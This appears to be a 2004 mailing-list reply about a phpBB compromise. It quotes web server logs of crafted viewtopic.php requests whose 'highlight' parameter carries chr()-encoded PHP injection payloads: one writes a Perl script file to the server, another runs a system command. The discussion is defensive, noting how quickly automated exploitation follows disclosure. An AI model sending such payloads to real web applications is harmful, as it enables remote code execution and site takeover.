On Mon, 20 Dec 2004, Shannon Lee wrote: > After some investigation, we determined that the attacker had gained > access via phpbb in a series of crafted URL requests, like so: > > 64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET > /viewtopic.php?p=9002&sid=f5 > 399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr > (49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),ch > r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47) > %252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252 > echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252ech > r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE > OMITTED.com/ It seems that automated exploiting starts soon after disclosure of the vulnerability: 62.221.209.145 - - [24/Nov/2004:14:09:05 +0200] "GET /viewtopic.php?t=50674&highlight= %2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527 HTTP/1.1" 404 219 Interestingly, we do not use phpbb and in fact do not have viewtopic.php at all. -- Regards, ASK
